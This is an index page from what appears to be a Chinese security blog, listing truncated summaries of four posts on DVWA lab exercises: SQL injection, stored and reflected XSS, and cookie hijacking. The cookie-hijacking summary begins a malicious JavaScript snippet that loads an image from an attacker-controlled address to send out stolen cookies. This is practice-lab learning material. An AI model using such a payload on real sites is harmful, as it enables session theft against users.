2021年1月28日
DVWA-SQL Injection(SQL注入)
摘要: 难度1-Low 查看代码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n 阅读全文
posted @ 2021-01-28 22:25 1jzz 阅读(82) 评论(0) 推荐(0) 编辑
DVWA-XSS(Stored)
摘要: 难度1-Low 查看代码: <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); 阅读全文
posted @ 2021-01-28 15:41 1jzz 阅读(81) 评论(0) 推荐(0) 编辑
Cookie劫持之DVWA(XSS-low)
摘要: 1、利用环境配置 首先在kali中开启apacha服务 sudo service apache2 start 然后在网站目录/var/www/html 下创建一个恶意js脚本 var image=new Image();image.src="http://192.168.31.155:8888/co 阅读全文
posted @ 2021-01-28 15:19 1jzz 阅读(240) 评论(0) 推荐(0) 编辑
DVWA-XSS(Reflected-反射型)
摘要: 难度1-Low 查看代码: <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>He 阅读全文
posted @ 2021-01-28 13:27 1jzz 阅读(70) 评论(0) 推荐(0) 编辑